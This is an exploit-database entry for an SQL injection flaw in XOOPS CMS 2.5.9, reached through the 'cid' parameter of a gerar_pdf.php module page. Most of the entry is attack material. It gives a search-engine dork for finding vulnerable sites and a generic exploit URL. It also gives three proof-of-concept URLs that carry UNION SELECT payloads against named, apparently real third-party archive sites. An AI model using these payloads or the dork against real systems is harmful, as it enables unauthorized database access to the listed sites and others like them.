XOOPS CMS 2.5.9 SQL Injection Vulnerability

2019-05-14T00:00:00
ID 1337DAY-ID-32681
Type zdt
Reporter Felipe Andrian Peixoto
Modified 2019-05-14T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            [+] Sql Injection on XOOPS CMS v.2.5.9

[+] Risk: High

[+] CWE Number : CWE-89

[+] Author: Felipe Andrian Peixoto

[+] Vendor Homepage: https://xoops.org/

[+] Contact: [email protected]

[+] Tested on: Windows 7 and Gnu/Linux

[+] Dork: inurl:gerar_pdf.php inurl:modules // use your brain ;)

[+] Exploit : 

        http://host/patch/modules/patch/gerar_pdf.php?cid= [SQL Injection]

[+] PoC : 
 
   https://memoria.fdc.org.br/modules/hemerografico/gerar_pdf.php?cid=4+AND+0+UniOn+SeLeCT+1,2,database(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44

http://acervofams.fundasantos.org.br/modules/cartografico/gerar_pdf.php?cid=373+AND+0+UniOn+SeLeCT+1,2,3,4,5,6,7,8,database(),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50--

http://acervo.apubh.org.br:8080/apubh/modules/bibliografico/gerar_pdf.php?cid=122+AND+0+UniOn+SeLeCT+1,2,database(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41

   
[+] EOF

#  0day.today [2019-05-14]  #